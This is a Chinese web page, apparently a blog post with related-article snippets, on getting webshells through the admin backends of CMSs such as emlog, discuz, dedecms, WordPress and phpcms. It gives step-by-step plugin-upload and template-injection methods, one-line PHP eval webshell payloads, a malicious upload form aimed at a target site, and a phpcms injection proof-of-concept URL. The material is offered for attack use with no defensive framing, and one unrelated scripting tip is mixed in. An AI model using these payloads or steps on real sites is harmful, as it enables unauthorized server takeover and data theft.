emblog后台拿shell

emlog版本:5.3.1

先本地弄好shell

新建一个文件夹,里面放shell,shell名称和文件名要一致。压缩为zip

然后在安装插件处上传。

成功后的路径content/plugins/test/test.php这个是主题包的路径

over.

时间: 2024-08-05 11:11:56

emblog后台拿shell的相关文章

discuz6.1两种方法后台拿shell

discuz6.1两种方法后台拿shell好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下1:http://127.0.0.1/discuz/admincp.php?action=runwizard&frames=yesadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell<?php eval($_POST[cmd]);?>后台webshell地址

关于phpweb后台拿shell简单方法。

首先登录后台admin.php 登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址. 代码文件如下: <form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.xxx.com/kedit/upload_cgi/upload.php"

CreateLiveCMSV4.0 漏洞,无需后台Get shell

Title:CreateLiveCMSV4.0 漏洞,无需后台Get shell --2012-03-06 17:28 标题:CreateLive CMS Version 4.0.1006 漏洞,无需后台 Get shell 必须环境:IIS6,上传目录可执行脚本 CreateLive CMS Version 4.0.1006 是个非常古老滴CMS了. ------------------------------------------------------------------------

KesionCMS V6.5后台拿SHELL方法

Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21 最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下来. 1. 新建x.asp用户再结合IIS的文件夹解析漏洞,是可以拿到SHELL的,前提是没有禁止.asp目录的访问,我弄的目标站,不允许访问.asp这样的目录下面的文件的. 2. 后台SQL执行导出webshell 理论上是可以的,我在本地可以导出ok.asp;o.xls这样的文件的.但是TXT文

另类dedecms后台拿shell

遇到一个被阉割的后台,发现直接传shell显然不行. 然后就有了下文 添加一个新广告. 插入一句话木马: 1 --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id. 原文地址:https://www.cnblogs.com/nul1/p/9042801.html

wordpress 5.1 后台拿shell

闲着没事搭建了一套最新版wordpress 5.1,本身wordpress后台安全防御是比较差的,想尝试下后台是否可以拿shell. 再上传插件的地方可以直接上传php文件,并且该文件可以执行: shell地址为:http://192.168.62.130/wordpress/wp-content/uploads/2019/03/9.php,其中2019/03为上传shell的年月份 原文地址:https://www.cnblogs.com/qiaodan/p/10556800.html

Yzmcms后台拿shell

废话不多说,直入正题 首先function.php 可以看到此方法是用数组遍历的方式写入到/config/config.php 打开config.php看看 <?php return array(   //系统配置 'site_theme' => 'default', //站点默认主题目录 'url_html_suffix' => '.html', //URL伪静态后缀   //数据库配置 'db_type' => 'mysqli', // 数据库链接扩展[暂支持 mysql 和

后台执行shell脚本

执行方式: nohup sh export_data.sh 20150102 >20150102.log 2>&1 & [1] 29531 其中 0.1.2分别代表如下含义: 0 – stdin (standard input) 1 – stdout (standard output) 2 – stderr (standard error) nohup+最后面的& 是让命令在后台执行 >out.log 是将信息输出到out.log日志中 2>&1 是

phpcmsV9.5.8 后台拿shell

参考url:https://xianzhi.aliyun.com/forum/read/1507.html poc:index.php??m=content&c=content&a=public_categorys&menuid=${@phpinfo()} 根据拿到的poc,phpcms的mvc结构,代码位于/phpcms/modules/content/content.php  第472-532行 public function public_categorys() { $sho